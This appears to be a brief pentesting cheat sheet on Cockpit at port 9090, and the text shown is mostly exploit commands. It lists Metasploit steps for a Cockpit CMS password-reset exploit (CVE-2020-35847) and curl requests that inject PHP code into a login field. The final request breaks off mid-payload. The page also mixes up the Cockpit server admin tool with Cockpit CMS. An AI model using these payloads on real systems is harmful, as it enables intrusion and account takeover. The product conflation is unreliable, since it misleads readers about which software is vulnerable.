Cockpit is an interactive server admin interface. It is easy to use and very lightweight. Cockpit interacts directly with the operating system from a real Linux session in a browser. Port: 9090 Github # Reset password (CVE-2020-35847) msf> use exploit/multi/cockpit_cms_rce msf> set USER admin msf> run #Find the Server info - search for string curl http://IP_ADdress:9090/ -o out.txt cat out.txt | grep "var environment" Known Exploits curl -X POST https://example.com/auth/check -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/json; charset=UTF-8' -H 'Origin: https://example.com' -d '{"auth":{"user":"test'\'';phpinfo();'\''","password":"b"}}' curl -kL -X POST https://example.com/auth/requestreset -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/json; charset=UTF-8' -H 'Origin: https://example.com' -d '{&